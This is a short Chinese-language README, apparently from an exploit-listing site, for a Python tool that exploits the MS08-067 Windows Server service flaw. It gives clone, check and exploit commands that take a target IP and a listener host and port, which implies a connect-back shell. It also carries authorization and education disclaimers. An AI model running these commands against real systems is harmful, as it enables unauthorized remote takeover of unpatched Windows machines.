## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BINRACER-MS08-067.PY

* * *
## 📖 概述
此仓库包含 MS08-067 Windows Server Service 漏洞(CVE-2008-4250)的一些 Python 脚本实现。这是一个影响旧版 Windows 系统的经典远程代码执行漏洞。
## 🛠️ 安装与使用
### 前置条件
* Python3
* 授权测试环境
### 🤔如何使用?
首先,打开 Shell 或 Cmd。然后 👉 运行以下命令:
root@kitploit:~
git clone https://github.com/BinRacer/ms08-067.py.git
cd ms08-067.py
pip install -r requirements.txt
python src/ms08_067_check.py <target_ip>
# before use ms08_067_exploit.py, must replace shellcode in python file
python src/ms08_067_exploit.py <target_ip> <lhost> <lport>
## ⚠️ 重要说明
* **法律合规** :请始终确保在测试任何安全漏洞之前获得适当的授权。
* **环境隔离** :在受控、隔离的环境中进行测试,以防止对系统造成非预期影响。
* **教育目的** :本资料仅用于教育和授权的安全研究。
有关完整的法律信息和免责声明,请参阅 文档。